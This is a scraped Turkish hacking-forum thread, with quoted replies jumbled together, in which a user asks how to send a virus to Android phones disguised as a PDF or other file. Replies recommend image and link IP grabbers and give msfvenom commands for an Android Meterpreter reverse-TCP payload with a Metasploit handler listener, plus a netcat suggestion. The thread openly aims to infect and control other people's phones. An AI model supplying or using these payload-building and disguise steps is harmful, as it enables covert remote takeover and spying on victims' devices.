meraha android telefonlara virüs atmak istiyorum bu attığım virüsü pdf dosyası şeklinde atmam mümkün mü veya apk dışında hangi formatlarda oluşturabilirim virüsü
Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.
Apk disinda yanliz link halinde ata bilrsin veya foto oda ancak cihaz bilgisi ve ip felanmeraha android telefonlara virüs atmak istiyorum bu attığım virüsü pdf dosyası şeklinde atmam mümkün mü veya apk dışında hangi formatlarda oluşturabilirim virüsü
foto ve link şeklinde nasıol atabilirimApk disinda yanliz link halinde ata bilrsin veya foto oda ancak cihaz bilgisi ve ip felan
atabilir misin toolları sana zahmetGithubda tollar var ama bir hosting acib link redirect kullanib kendi sitene cekersen logda bakabilrsin yok ugrasmak isdemiyorsan tool kullan foto icinde toollar var image ip grabber kullana bilirsin
metasploiti biliyorum onun dışında yok muMerhaba öncelikle ben The Cyber Sh4d0w. Bunun için öncelikle bir bir terminale ve metasploit tool una ihtiyacın var. Bu greksinimleri karşıladıktan sonra terminale: msfvenom -p android/meterpreter/reverse_tcp LHOST=(KENDİ İP İN) LPORT=(İSTEDİĞİN PORT) -o (oluşturulmasını istediğin dizin)
Kodunu giriyorsun. Ardından msfconsole yazıp metasplpit açılınca use exploit/multi7handler set payload android/meterpreter/reverse_tcp diyip ve yine LHOST=(kendi ip in) LPORT(Başta Gİrdiğin Port) diyip run diyorsun ve bitti. Bir de demişsin ki virüsümü PDF gibi dosyaların içine gömebilir miyim ve uzantısını PDF vb dosyalar yapabilir miyim? Demişsin evet internette araştırabilirsin zaten TurkHackTeam yani burdada o konuyla ilgili Forumlar var iyi formlar İyi Hacklemeler![]()
tesekkurxiaomi id biliyorsan sifirlaya bilirsin
formu da etiketleyebilirsen çok iyi olurMerhaba öncelikle ben The Cyber Sh4d0w. Bunun için öncelikle bir bir terminale ve metasploit tool una ihtiyacın var. Bu greksinimleri karşıladıktan sonra terminale: msfvenom -p android/meterpreter/reverse_tcp LHOST=(KENDİ İP İN) LPORT=(İSTEDİĞİN PORT) -o (oluşturulmasını istediğin dizin)
Kodunu giriyorsun. Ardından msfconsole yazıp metasplpit açılınca use exploit/multi7handler set payload android/meterpreter/reverse_tcp diyip ve yine LHOST=(kendi ip in) LPORT(Başta Gİrdiğin Port) diyip run diyorsun ve bitti. Bir de demişsin ki virüsümü PDF gibi dosyaların içine gömebilir miyim ve uzantısını PDF vb dosyalar yapabilir miyim? Demişsin evet internette araştırabilirsin zaten TurkHackTeam yani burdada o konuyla ilgili Forumlar var iyi formlar İyi Hacklemeler![]()
Netcat - la cekebilrsin arasdir biraz netcatiatabilir misin toolları sana zahmet